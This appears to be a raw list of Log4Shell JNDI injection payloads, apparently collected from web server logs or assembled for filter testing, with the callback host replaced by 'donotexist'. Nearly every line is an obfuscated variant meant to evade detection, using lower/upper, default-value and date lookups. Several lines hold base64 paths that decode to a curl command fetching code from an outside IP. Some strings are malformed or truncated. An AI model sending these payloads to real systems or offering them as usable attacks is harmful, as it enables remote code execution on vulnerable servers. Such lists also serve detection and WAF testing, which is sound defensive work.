${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://donotexist/6qnv7r}
${${date:'j'}${date:'n'${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://donotexist/h959yl.}
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://donotexist/2.26.0}
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}${date:'l'}${date:'d'}${date:'a'}${date:'p'}://donotexist/2.26.0}
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://donotexist/6qnv7r}
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://donotexist/o2le7z}
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://donotexist/ygeytd}
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://donotexist/o2le7z}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}da${env:NaN:-:}//donotexist/Comm}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//donotexist/Com}
${${env:x:-j}ndi${env:y:-:}${env:z:-l}dap${env:3:-:}//donotexist/hi}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://donotexist/Bas
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://donotexist/Bas}
${$::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://donotexist/t}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://donotexist/t}
${${::-j}${::-n}${::-d}$::-i}:${::-r}${::-m}${::-i}://donotexist/Binary}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://donotexist/Binary}
${${::-j}nd${::-i}:ldap://donotexist/or2q2y}
${${::-j}ndi:dns://donotexist/securityscan-aaa}
${${::-j}ndi:rmi://donotexist/#Binary}
${${lower:${lower:jnd}}:${lower:rmi}://donotexist/Binary}
${${lower:${lower:jndi}}:${lower:rmi}://donotexist/#Binary}
${${lower:${lower:jndi}}:${lower:rmi}://donotexist/Binary}
${${lower:${lower:jndi}}${lower:rmi}://donotexist/jijec}
${${lower:${lower:jndi}}:ld${lower:ap}://donotexist/t}
${$lower:${lower:jndi}}:ld${lower:ap}://donotexist/t}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://donotexist/Binary}
${${lower:j}${lower:n}$lower:d}i:${lower:rmi}://donotexist/jijec}
${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://donotexist/t}
${$lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://donotexist/t}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://donotexist/test
${$lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://donotexist/test
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://donotexist/Binary}
${${lower:j}${upper:n${lower:d}${upper:i}:${lower:r}m${lower:i}}://donotexist/Binary}
${${lower:j}${upper:n}$lower:d}${upper:i}:${lower:r}m${lower:i}}://donotexist/Binary}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://donotexist/jijec}
${${lower:j}${upper:n${lower:d}${upper:i}:${lower:r}m${lower:i}}://donotexist/jijec}
${${lower:j}${upper:n}$lower:d}${upper:i}:${lower:r}m${lower:i}}://donotexist/jijec}
${${lower:jndi}:${lower:rmi}://donotexist/#Binary}
${${ueLd:JghU:kyH:C:TURit:-j}${odX:t:STGD:UaqOvq:wANmU:-n}${mgSejH:tpr:zWlb:-d}${&nbsp; &nbsp; User Agent: Mozilla/5.0}
${${ueLd:JghU:kyH:C:TURit:-j}${odX:t:STGD:UaqOvq:wANmU:-n}${mgSejH:tpr:zWlb:-d}${o&nbsp; &nbsp; User Agent: Mozilla/5.0}
${jnd:${lower:l}${lower:d}a${lower:p}://donotexist/callback}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://donotexist/aaa}
${jndi:${lower:l}${lower:d}${lower:p}://donotexist/callback}
${jndi:${lower:l}${lower:d}a${lower:p}://donotexist/5.0}
${jndi:${lower:l}${lower:d}a${lower:p}://donotexist/callback}
${jndi:${lower:l}${lower:d}a$lower:p}://donotexist/callback}
${jndi:${lower:l}${lower:d}a${lower:p}://donotexist/callback}
${jndi:dns://donotexist/5.0}
${jndi:iiop://donotexist/1639715774}
${jndi:ldap://donotexist/${hostName}.test}
${jndi:ldap://donotexist/${hostName}.useragent.}
${jndi:ldap://donotexist/127.0.0.1#.${hostName}.useragent.}
${jndi:ldap://donotexist/1}donotexist}
${jndi:ldap://donotexist/2.${hostName}.poc}
${jndi:ldap://donotexist/5.0
${jndi:ldap://donotexist/divd_${date:YYYYMMddHHmmss}_https_User-Agent.log4jdns
${jndi:ldap://donotexist/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4x}
${jndi:ldap://donotexist/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC85Ni4x}
${jndi:ldap://donotexist/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC85Ny4x}
${jndi:ldap://donotexist/unk13yf}
${jndi:&nbsp; &nbsp; Referer: -&nbsp; &nbsp; User Agent: ${jndi:ldap://donotexist/lx-test}}
